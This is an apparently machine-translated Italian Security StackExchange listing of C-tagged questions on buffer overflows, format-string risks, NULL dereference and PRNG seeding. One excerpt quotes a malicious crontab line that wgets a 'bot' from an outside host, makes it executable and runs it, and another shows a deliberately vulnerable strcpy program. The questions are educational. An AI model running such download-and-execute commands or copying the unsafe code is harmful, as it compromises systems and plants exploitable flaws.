Domande con tag 'c'

4
risposte

Implicazioni sulla sicurezza di trascurare il byte extra per la terminazione NULL in array C / C ++

Considerare : l'inglese è la mia seconda lingua. Nel podcast Security Now! episodio 518 ( HORNET: A Fix for TOR? ), al 27:51 Steve Gibson cita un esempio di codice vulnerabile in C / C ++: "[...] one of them [problems with vulnerab...
posta 29.07.2015 - 12:54
1
risposta

L'overflow del buffer di exploitation porta al segfault

Sto cercando di sfruttare la vulnerabilità di overflow dello stack semplice. Ho un codice di base in c: #include <cstring> int main( int argc, char** argv ) { char buffer[500]; strcpy(buffer, argv[1]); return 0; }...
posta 10.11.2014 - 13:10
4
risposte

La compilazione da fonti "kinda" protegge dagli attacchi di overflow del buffer?

Durante la discussione sui buffer overflow, qualcuno mi ha detto che compilare il proprio binario per un'applicazione (con specifici flag di compilazione) invece di usare il "mainstream binary" rende più difficile per un attacker sfruttare il...
posta 18.07.2011 - 23:26
4
risposte

Codice ingannevole per rendere la memoria sicura

Sto progettando una sfida per i compiti a casa per gli studenti che stanno imparando sulla sicurezza della memoria e scrivendo codice C sicuro. Come parte di questo, sto cercando un piccolo compito di programmazione in cui non è banale scrivere...
posta 10.12.2013 - 09:12
4
risposte

Come è printf () in C / C ++ una vulnerabilità di overflow del buffer?

Secondo un articolo che ho appena letto, le funzioni printf e strcpy sono considerate vulnerabilità di sicurezza a causa di overflow del buffer. Capisco quanto strcpy sia vulnerabile, ma qualcuno potrebbe spiegare come / se printf...
posta 09.10.2013 - 17:53
3
risposte

SecureShellz è un virus bot? Come funziona?

Sto usando un server di sviluppo in cui ho trovato questo nel crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/...
posta 06.07.2012 - 11:08
1
risposta

Come prevedere C rand ()? [duplicare]

Esiste un modo pratico per prevedere l'output C / R precedente / successivo se ho alcuni valori? Di quanti valori ho bisogno? Devono essere conseguenti? Se dipende dal compilatore - per quali implementazioni è possibile e come?     
posta 27.02.2013 - 20:16
2
risposte

implicazioni di sicurezza della dereferenza NULL

Supponiamo di avere un codice come questo: struct somedata { int a; int b; }; struct somedata *data; /* ... */ data = malloc(sizeof(struct somedata)); data->a = something; Ora, come puoi vedere, manca il controllo del puntatore NUL...
posta 28.07.2011 - 19:00
1
risposta

Come seminare correttamente il PRNG in OpenSSL?

Sto creando un'applicazione che gira su un nodo mobile con Ubuntu, che non genera abbastanza byte di entropia per / dev / random, e non rimane sempre connessa su Internet per usare tipiche soluzioni di raccolta di entropia socket come EGD. Ci...
posta 21.04.2011 - 23:42
2
risposte

È possibile codificare i byte in un exploit di overflow del buffer che bypassano le funzioni di stringa?

Disclaimer : questo exploit è puramente per uso didattico. In questo exploit interpreto il ruolo della vittima e il software sfruttato è scritto da me da solo. Ho un semplice server HTTP che voglio sfruttare con un attacco di overflow del bu...
posta 25.07.2015 - 14:00